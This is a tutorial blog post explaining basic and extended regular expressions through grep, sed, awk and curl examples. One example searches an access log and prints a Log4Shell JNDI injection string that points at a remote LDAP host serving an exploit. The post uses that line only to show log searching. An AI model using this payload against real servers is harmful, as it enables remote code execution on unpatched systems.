Regular expressions

17 December 2021

A regular expression, or regex, is a sequence of characters that represents a pattern. They are commonly used in code and text processing. For instance, you can use a regex to validate user input or to filter specific data from a log file.

Regular expressions should not be confused with globbing. A glob is also a sequence of characters that represents a pattern, but the shell uses it for file name expansion on the command line. As a simple example of globbing, you can list all PHP files in a directory with the command ls *.php. The glob in the command is the asterisk, which on its own matches zero or more characters. In a regex the asterisk matches zero or more instances of the preceding character. There are a few differences like this, and it is easy to get them muddled up.
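
To make the difference concrete, here is a small sketch that assumes a POSIX shell. The helper names glob_match and regex_match and the sample strings are made up for illustration. The case statement treats “a*” as a glob, while grep treats “a*” as a regex:

```shell
# Glob: the asterisk on its own stands for any run of characters.
glob_match() {
    case "$1" in
        a*) echo "match" ;;
        *)  echo "no match" ;;
    esac
}

# Regex: the asterisk repeats the preceding character (here "a")
# zero or more times.
regex_match() {
    if printf '%s\n' "$1" | grep -q '^a*$'; then
        echo "match"
    else
        echo "no match"
    fi
}

glob_match  "abc"   # the glob a* accepts anything that starts with "a"
regex_match "abc"   # the regex ^a*$ only accepts strings made up of "a"s
regex_match "aaa"
regex_match ""      # zero repetitions also count
```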

Another thing to be aware of is that there are two types of regular expressions: basic (BRE) and extended (ERE). As the names suggest, extended regular expressions have a few extra options. Utilities such as grep and sed use basic regular expressions by default. However, with both you can use the -E option to enable extended regular expressions.
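
As a rough illustration of the difference, the sketch below runs the same pattern through grep with and without -E. The sample words are invented for the example. In a basic regular expression the question mark is an ordinary character, whereas in an extended regular expression it makes the preceding character optional:

```shell
# Hypothetical sample input: three lines.
sample='color
colour
colou?r'

# BRE (the default): the question mark is an ordinary character,
# so only the line with a literal "?" matches.
bre=$(printf '%s\n' "$sample" | grep 'colou?r')

# ERE (-E): the question mark makes the preceding "u" optional,
# so "color" and "colour" match.
ere=$(printf '%s\n' "$sample" | grep -E 'colou?r')

printf 'BRE:\n%s\n' "$bre"
printf 'ERE:\n%s\n' "$ere"
```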

Basic regular expressions

Anchor characters

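The caret (^) and dollar sign ($) denote the start and end of a string. You can use the caret to get lines in a file that start with a certain string, such as a date or IP address. In the example below the dots are escaped with a backslash so that they match literal dots (an unescaped dot matches any character, as explained further down), and the trailing space stops the pattern from matching longer addresses such as 1.2.3.40:

# grep '^1\.2\.3\.4 ' /var/log/httpd/example.log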
1.2.3.4 - - [14/Dec/2021:04:55:27 +0000] "GET /wp-login.php HTTP/1.1" 403 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...

Or, on a RHEL-based system you can count the number of AMD64 packages by looking at the end of the package names. Here, I list all packages on my system and then pipe the output to a grep command that counts the number of lines that end with the string “x86_64”:

# rpm -qa | grep -c 'x86_64$'
541

And you can also use both anchors. For instance, this is a quick way to delete empty lines using sed. The command matches any lines in the file named data that start and end with nothing (i.e. there is nothing between the caret and dollar sign):

$ sed '/^$/d' data
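
If you want to try the anchors without touching a real file, a sketch along these lines should work. The three-line sample input is made up, and the variable names are just for illustration:

```shell
# Hypothetical sample input: three lines, the middle one empty.
sample=$(printf 'first\n\nlast')

# Delete lines that have nothing between the start (^) and the end ($).
cleaned=$(printf '%s\n' "$sample" | sed '/^$/d')

# Count the lines that start with "f" and the lines that end with "t".
starts=$(printf '%s\n' "$sample" | grep -c '^f')
ends=$(printf '%s\n' "$sample" | grep -c 't$')

printf '%s\n' "$cleaned"
echo "start with f: $starts, end with t: $ends"
```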

The dot and asterisk

A dot matches any single character. For instance, here I look for lines in a log file where the first field matches the pattern “^2021-12-1.$”:

# awk '$1 ~ /^2021-12-1.$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

If you are an eagle-eyed reader then you might have noticed that the regex is more or less redundant. The pattern “2021-12-1” would return the same set of results. The difference is that the pattern “^2021-12-1.$” makes sure that you only match lines whose first field is “2021-12-1” plus exactly one character. It would ignore any malformed date fields.

The dot is often used in combination with the asterisk, which is a quantifier that matches the preceding character zero or more times. Together, “.*” matches any run of characters. You can use this to grep multiple strings on a single line. For instance, here I look for lines containing the strings “14/Dec” and “jndi:ldap” (with anything in between the two patterns):

# grep "14/Dec.*jndi:ldap" /var/log/httpd/example.log
112.74.52.90 - - [14/Dec/2021:11:40:06 +0000] "GET / HTTP/1.1" 200 4917 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"
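
The same idea can be tested on a few invented log lines. This is only a sketch; the log content and variable names are assumptions made for the example:

```shell
# Hypothetical log lines, made up for this example.
log='14/Dec GET /index.php
14/Dec GET /?x=${jndi:ldap://example}
15/Dec GET /?x=${jndi:ldap://example}'

# ".*" bridges the gap between the two fixed strings on the same line.
hits=$(printf '%s\n' "$log" | grep -c '14/Dec.*jndi:ldap')

# A single dot must consume exactly one character, so "1./Dec" matches
# "14/Dec" and "15/Dec" but would not match "1/Dec".
days=$(printf '%s\n' "$log" | grep -c '1./Dec')

echo "lines with both strings: $hits"
echo "lines with a date in the 10s: $days"
```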

Character ranges

A minute ago I argued that the pattern “^2021-12-1.$” is slightly better than “2021-12-1”. As things stand, though, the pattern would match a string like “2021-12-1x”. That is a problem, as our aim is to match (valid) dates.

We can further improve the pattern by making sure that the last character is a digit. To do so, you can use a range:

# awk '$1 ~ /^2021-12-1[0-9]$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

A range is defined in square brackets. In the above example I used “[0-9]”, which matches any single digit in the range 0 to 9. You can do the same with letters. For instance, “[a-z]” matches any single lower case letter. It is worth pointing out that ranges are case-sensitive. To match a letter in either lower or upper case you can use “[a-zA-Z]”. And to match any alphanumeric character you can use “[a-zA-Z0-9]”.

You can also list specific characters rather than a range. For instance, if you have a script that needs to check if a user answered “y” or “Y” to a question then you can use “[yY]”.
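
A script could wrap that check in a small function. The sketch below is one way to do it; is_yes is a hypothetical helper name, and the anchors make sure the answer is exactly one character long:

```shell
# is_yes is a hypothetical helper: it succeeds when the answer is
# a single "y" or "Y" and fails for anything else.
is_yes() {
    printf '%s\n' "$1" | grep -q '^[yY]$'
}

for answer in y Y n yes; do
    if is_yes "$answer"; then
        echo "$answer: accepted"
    else
        echo "$answer: rejected"
    fi
done
```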

Negating ranges

You can also do the reverse. If you want to match any character that is not a digit then you can put a caret at the start of the range. So, “[^0-9]” matches any single character except a digit. Notice that the meaning of the caret symbol is now wildly different from its earlier meaning. Outside ranges the caret denotes the start of a string.
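
Here is a short sketch of both meanings of the caret side by side. The phone number and the sample lines are invented for the example:

```shell
# Strip every character that is not a digit, e.g. from a phone number.
digits=$(printf '%s\n' '01234 567-890' | sed 's/[^0-9]//g')
echo "$digits"

# Inside the brackets the caret negates; outside it anchors.
# This keeps the lines whose first character is not a digit.
nondigit_start=$(printf '%s\n' '1 apple' 'pear' | grep '^[^0-9]')
echo "$nondigit_start"
```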

Special character classes

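There are a few special character classes you can use instead of ranges such as “[a-z]”. The class name is written between a pair of colons inside square brackets (for instance “[:alpha:]”), and that expression in turn goes inside the square brackets of a range, which is why the classes appear with double square brackets.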

Class	Matches	Equivalent
`[[:alpha:]]`	Alphabetical characters	`[a-zA-Z]`
`[[:alnum:]]`	Alphabetical characters and digits	`[a-zA-Z0-9]`
`[[:blank:]]`	Space or tab characters	`[ \t]`
`[[:digit:]]`	Digits	`[0-9]`
`[[:lower:]]`	Lower case alphabetical characters	`[a-z]`
`[[:upper:]]`	Upper case alphabetical characters	`[A-Z]`
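
The classes behave like any other range, so you can chain them or mix them with literal characters inside the same brackets. A minimal sketch, using made-up sample words:

```shell
# Hypothetical sample words.
words='Hello
hello
HELLO
Hello2'

# One upper case letter followed by lower case letters only.
capitalised=$(printf '%s\n' "$words" | grep '^[[:upper:]][[:lower:]]*$')
echo "$capitalised"

# A class can share the brackets with other characters:
# here letters, digits or an underscore.
identifier=$(printf '%s\n' 'user_01' 'user-01' | grep '^[[:alnum:]_]*$')
echo "$identifier"
```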

Extended regular expressions

Extended regular expressions bring a few more meta characters to the party. As mentioned, you need to use the -E option if you want to use ERE in grep and sed.

The question mark

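Like the asterisk, the question mark is a quantifier. But, whereas the asterisk matches the preceding character zero or more times, the question mark matches the preceding character zero or one time. To illustrate, if you want to check if a user entered “y”, “Y”, “yes” or “YES” then you can use the pattern “^[yY][eE]?[sS]?$”. Be aware that the pattern is fairly permissive: because each letter is matched independently, it also accepts mixed-case answers such as “Yes” and partial answers such as “ye” or “ys”: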

$ echo 'y' | grep -E "^[yY][eE]?[sS]?$"
y

$ echo 'YES' | grep -E "^[yY][eE]?[sS]?$"
YES

$ echo 'YES!' | grep -E "^[yY][eE]?[sS]?$"

Notice that the string “YES!” does not match. The reason is that I used the dollar sign to mark where the string ends.
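
Another common use of the question mark is an optional letter in a fixed word. The sketch below, which uses invented URLs, keeps lines that start with either “http://” or “https://”:

```shell
# Hypothetical list of URLs.
urls='http://example.com
https://example.com
httpss://example.com
ftp://example.com'

# "s?" allows zero or one "s" between "http" and "://".
matched=$(printf '%s\n' "$urls" | grep -E '^https?://')
printf '%s\n' "$matched"
```

The third line is rejected because the question mark allows at most one “s”.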

Curly braces

Curly braces ({ and }) let you specify how many times the preceding element can appear. For instance, let’s say you want to check if a string uses the format YYYY-MM-DD. You can do that with the following pattern:

$ echo '2021-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"

The second test failed because the string “21-12-15” doesn’t start with four digits. If you want to allow a two-digit year as well then you can use the range {2,4}, which accepts between two and four digits (so a three-digit year would also pass):

$ echo '2021-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15
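
It is worth testing a pattern like this against a few edge cases. The sketch below does that with a hypothetical helper named check_date. Keep in mind that “{2,4}” means “between two and four”, so a three-digit year also passes:

```shell
# check_date is a hypothetical helper that reports whether its
# argument has the shape (2 to 4 digits)-(2 digits)-(2 digits).
check_date() {
    if printf '%s\n' "$1" |
        grep -Eq '^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$'; then
        echo "match"
    else
        echo "no match"
    fi
}

for d in 2021-12-15 21-12-15 021-12-15 20211-12-15; do
    echo "$d: $(check_date "$d")"
done
```

The pattern only checks the shape of the string. It does not check that the month and day are valid.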

Grouping expressions

An alternative way to validate the strings “2021-12-15” and “21-12-15” is to use grouping expressions. You can group a pattern using parentheses, and you can then apply a quantifier or other meta character to the group as a whole. So, you can use “(20)?” if the string may or may not start with “20”:

$ echo '2021-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15
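
Groups can be combined with curly braces as well. As a sketch, the hypothetical helper below checks whether a string looks like an IPv4 address by repeating the group “one to three digits plus a dot” three times:

```shell
# looks_like_ipv4 is a hypothetical helper. It checks the shape only,
# so out-of-range values such as 999.1.1.1 still pass.
looks_like_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

for ip in 1.2.3.4 1.2.3 1.2.3.4.5 999.1.1.1; do
    if looks_like_ipv4 "$ip"; then
        echo "$ip: looks like an IPv4 address"
    else
        echo "$ip: rejected"
    fi
done
```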

Pipes

The pipe symbol (|) functions as an OR operator. In other words, it lets you match one of multiple patterns. This can be handy to grep lines that contain one of multiple strings.

For instance, if you want to check if a website redirects correctly you can use a simple cURL command. That works, but the output contains lots of other information:

$ curl -IL catalyst2.com
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
date: Tue, 14 Dec 2021 15:04:41 GMT
location: https://catalyst2.com/
x-frame-options: SAMEORIGIN

HTTP/2 301 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
expires: Mon, 13 Dec 2021 14:11:46 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://www.catalyst2.com/
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

HTTP/2 200 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
link: <https://www.catalyst2.com/wp-json/>; rel="https://api.w.org/"
link: <https://www.catalyst2.com/wp-json/wp/v2/pages/5>; rel="alternate"; type="application/json"
link: <https://www.catalyst2.com/>; rel=shortlink
etag: "24284-1639400931;;;"
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

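To get just the information you are interested in you can grep lines that start with either “HTTP” or “Location”. The parentheses make sure that the caret applies to both alternatives rather than just the first one:

$ curl --silent -IL catalyst2.com | grep -Ei '^(http|location)'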
HTTP/1.1 301 Moved Permanently
location: https://catalyst2.com/
HTTP/2 301 
location: https://www.catalyst2.com/
HTTP/2 200
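
One thing to watch with the pipe is how it interacts with anchors. An anchor only applies to the alternative it is written in, unless you group the alternatives. The sketch below shows the difference on a few invented header lines (the x-note header is made up for the example):

```shell
# Hypothetical response headers.
headers='HTTP/1.1 301 Moved Permanently
location: https://example.com/
x-note: see location header'

# Without a group the caret belongs to "http" only, so "location"
# is matched anywhere on the line.
loose=$(printf '%s\n' "$headers" | grep -Eic '^http|location')

# With a group the caret applies to both alternatives.
strict=$(printf '%s\n' "$headers" | grep -Eic '^(http|location)')

echo "without group: $loose lines, with group: $strict lines"
```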
